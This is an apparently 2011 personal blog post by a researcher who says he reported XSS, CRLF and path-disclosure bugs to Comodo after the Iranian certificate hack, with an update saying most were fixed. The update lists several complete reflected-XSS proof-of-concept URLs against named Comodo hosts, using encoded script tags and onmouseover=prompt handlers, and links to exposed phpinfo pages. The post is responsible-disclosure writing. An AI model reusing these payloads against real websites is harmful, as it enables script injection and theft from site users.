Recently heard on the Internet about hacking comodo by Iranian hackers.
three weeks ago I submitted a Significant number of vulnerabilities (including XSS. CRLF, full path disclosure, information leak) to comodo, and it’s Over a week that they didn’t fix any of them.
I didn’t send the vulnerabilities to have some credit or something from them but only to show the real face of iran and iranian people.
In my believe, it’s a mistake to steal digital certifications and use it against people As making stuxnet was.
If any person or government belives in freedom of expression and information , then violating of privacy of people will be meaningless. I expect to have a safe and private web surf as every user in america, italia, brazil, or egypt should have.
People around the world have a lot in common, So don’t try to place them against each other.
Although Comodo is a victim of this attack, but they still neglect about the problems, This is not a good point for a company like Comodo, and I’m sure these bugs will be fixed in the next few days.
Remember, Although an XSS vulnerability does not give the attacker a direct access to the server,
but it can be One of the main pillars of an attack.
Hoping for a safe Internet.
———————————-
Update 2011-12-02
Comodo fixed many of bugs
http://www.comodo.com/ttb_searcher/!ML_MANAGE?email=Email%20Address&FUNC=1%3CScRiPt%20%3Ealert%28%27xss%27%29%3C%2fScRiPt%3E&interface=2&list_id=6
http://www.comodo.com/resources/webinars/view-webinar.php?cat=%22%20onmouseover%3dprompt%2811%29%20bad%3d%22&id=enhancing-your-business-with-social-media&title=Enhancing%20Your%20Business%20with%20Social%20Media
http://enterprise.comodo.com//resources/download-form.php?cat=%22%20onmouseover%3dprompt%28110%29%20bad%3d%22&id=&title=&type=
http://enterprise.comodo.com/resources/download-form.php?e=no&cat=\%22%20onmouseover=prompt%2811%29%20bad=\%22&id=secure-email-pki-management-2008-10&title=Secure%20Email%20and%20PKI%20Management&type=white-papers
http://personalfirewall.comodo.com/setup.php?prod=%22%20onmouseover%3dprompt%2811%29%20bad%3d%22
https://secure.comodo.com/products/SSLIdASignup1b?csr=1%3C%2ftextarea%3E1%3CScRiPt%20%3Eprompt%28979212%29%3C%2fScRiPt%3E&days=17&days_radio=365&licenceCode=94102&product=24&serverSoftware=0&SID=vX5YZqBRwBShT0M3&totalCost=
https://support.comodo.com/index.php?_a=steps&_m=troubleshooter&action=Next%20%3E&backid=a%3a1%3a{i%3a-1%3bi%3a0%3b}&backidpass=%27%20onmouseover%3dprompt%2811%29%20bad%3d%27¤ttroubleshooterid=&parenttroubleshooterid=21&troubleshootercatid=4
Server
Informaion: (with phpinfo)
https://support.comodo.com/test.php
http://help.comodo.com/test.php